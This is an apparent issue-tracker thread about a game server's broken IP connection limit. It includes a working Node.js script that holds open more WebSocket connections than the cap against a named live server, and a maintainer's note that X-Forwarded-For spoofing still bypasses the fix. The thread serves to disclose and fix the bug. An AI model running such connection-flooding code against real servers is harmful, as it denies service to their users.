[HIGH] IP limit broken.

[10maurycy10]

The current IP limit code caps total connections to 6, not connections/ip.

This allows a trival complete denial of service attack with minimal resources.

const WebSocket = require("ws")

const url = "wss://darrows.zerotixdev.repl.co/"
const count = 7; // One more than the connection cap.

var cons = []; // array for open connections
function connect() { // function that connects and reconnects to the server.
    console.log("checking connection status...")
    for (var i = 0; i<count; i++) { // for all connection slot...
        if (!cons[i]) { // if connection slot is not full...
            cons[i] = new WebSocket(url) // open connection
            console.log(`connection ${i} connecting.`)
            cons[i].onclose = () => { // If connection closes, remove entry and log.
                console.log(`connection ${i} dropped.`)
                delete cons[i];
            }
        }
    }
}
setInterval(() => connect(), 1000) // (re)connect every second.

There, I dropped the code.

[ZeroTixDev]

Why would the current ip limit code caps total connections to the game to be 6 people instead of per ip? Weird Was this an issue after the current update or was it always a bug and I just never noticed

reachedIpLimit:function (ips, ip, limit) {
        let count = 0;
        for (let i = 0; i < ips.length; i++) {
            if (ip === ips[i]) {
                count++;
                if (count >= limit) {
                    return true;
                }
            }
        }
        return count >= limit;
    }```

[10maurycy10]

@ZeroTixDev The bug is new, previosly, I was able to create hundreds of simultanios connections.

[ZeroTixDev]

Fixed. (However you can still technically spoof x-forwarded-for but at least the IP limit works as intended when you don't try to spoof)